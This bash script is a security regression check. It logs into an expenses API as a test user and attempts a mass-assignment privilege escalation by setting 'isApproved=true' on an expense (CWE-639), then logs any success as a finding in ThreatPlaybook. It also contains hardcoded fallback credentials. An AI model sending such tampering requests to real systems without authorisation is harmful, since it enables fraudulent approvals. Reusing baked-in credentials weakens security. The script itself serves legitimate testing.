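#!/usr/bin/env bash
# Security regression check: can a normal user of the expenses API flip
# `isApproved` on an expense via mass assignment (CWE-639)?  If the tampering
# request is accepted, the finding is recorded in ThreatPlaybook.
#
# Usage:   ./check_mass_assignment.sh <target-host>
# Env:     SERVER_IP        host running ThreatPlaybook (port 81) — required
#          TARGET_EMAIL / TARGET_PASSWORD   test user on the target app
#          TP_EMAIL / TP_PASSWORD           ThreatPlaybook account
#          (the *_EMAIL/*_PASSWORD defaults below exist only to stay
#          compatible with the original one-off script; set them in the
#          environment rather than relying on credentials baked into a repo)
# Exit:    0  tampering was rejected (control works) or finding was recorded
#          1  could not authenticate, or could not record the finding
#
# Deliberately NOT `set -e`: the exploit request is *expected* to fail once the
# bug is fixed, and that path must still exit 0.  `pipefail` is needed so that
# `http --check-status | jq` reports http's failure instead of jq's exit code.
set -uo pipefail

target="${1:?usage: $0 <target-host>}"
: "${SERVER_IP:?SERVER_IP (ThreatPlaybook host) must be set}"

TARGET_EMAIL="${TARGET_EMAIL:-maya.williams@widget.co}"
TARGET_PASSWORD="${TARGET_PASSWORD:-superman123}"
TP_EMAIL="${TP_EMAIL:-admin@admin.com}"
TP_PASSWORD="${TP_PASSWORD:-supersecret}"

# NOTE: httpie takes credentials and bearer tokens as argv, so they are visible
# to other local users via `ps` while each request runs.

# --- 1. Authenticate to the target as the low-privilege test user -----------
TOKEN=$(http POST "http://${target}:3000/users/login" \
          email="$TARGET_EMAIL" password="$TARGET_PASSWORD" --check-status \
        | jq -r .token)
authRetVal=$?
# A 200 without a `token` field makes jq print the literal string "null".
if [[ $authRetVal -ne 0 || -z "$TOKEN" || "$TOKEN" == "null" ]]; then
  echo "Unable to Authenticate to Web Service" >&2
  exit 1
fi

# --- 2. Attempt the privilege escalation -----------------------------------
# A regular user should never be able to set isApproved on their own expense.
http POST "http://${target}:3000/expenses/update_expense/5ace11e4b10d64111c00adb3/" \
  Authorization:"$TOKEN" amount=30 merchant="Gunrock Café" \
  name="Dinner at Airport Food Court" isApproved=true --check-status
exploitRetVal=$?
if [[ $exploitRetVal -ne 0 ]]; then
  # Server rejected the tampering: the control is in place, nothing to report.
  echo "Unable to tamper with approval status"
  exit 0
fi

# --- 3. Record the confirmed finding in ThreatPlaybook ---------------------
TP_TOKEN=$(http POST "http://${SERVER_IP}:81/api/login" \
             email="$TP_EMAIL" password="$TP_PASSWORD" --check-status \
           | jq -r .data.token)
if [[ $? -ne 0 || -z "$TP_TOKEN" || "$TP_TOKEN" == "null" ]]; then
  echo "Unable to authenticate to ThreatPlaybook" >&2
  exit 1
fi

SCAN_NAME=$(http POST "http://${SERVER_IP}:81/api/scan/create" \
              Authorization:"$TP_TOKEN" tool=manual target=newwebapp2 --check-status \
            | jq -r .data.name)
if [[ $? -ne 0 || -z "$SCAN_NAME" || "$SCAN_NAME" == "null" ]]; then
  echo "Unable to create scan" >&2
  exit 1
fi

# `cwe:=639` / `severity:=3` use httpie's raw-JSON syntax so they stay numbers.
http POST "http://${SERVER_IP}:81/api/vulnerability/create" \
  Authorization:"$TP_TOKEN" scan="$SCAN_NAME" \
  name="Authorization Bypass through Mass Assignment" cwe:=639 severity:=3 \
  description="User is able to escalate privileges and perform approvals for invoices raised by the user" \
  vul_name="Mass Assignment" --check-status
pushRetVal=$?
if [[ $pushRetVal -ne 0 ]]; then
  echo "Unable to create vulnerability" >&2
  exit 1
fi
echo "Successfully created scan and vulnerability in ThreatPlaybook"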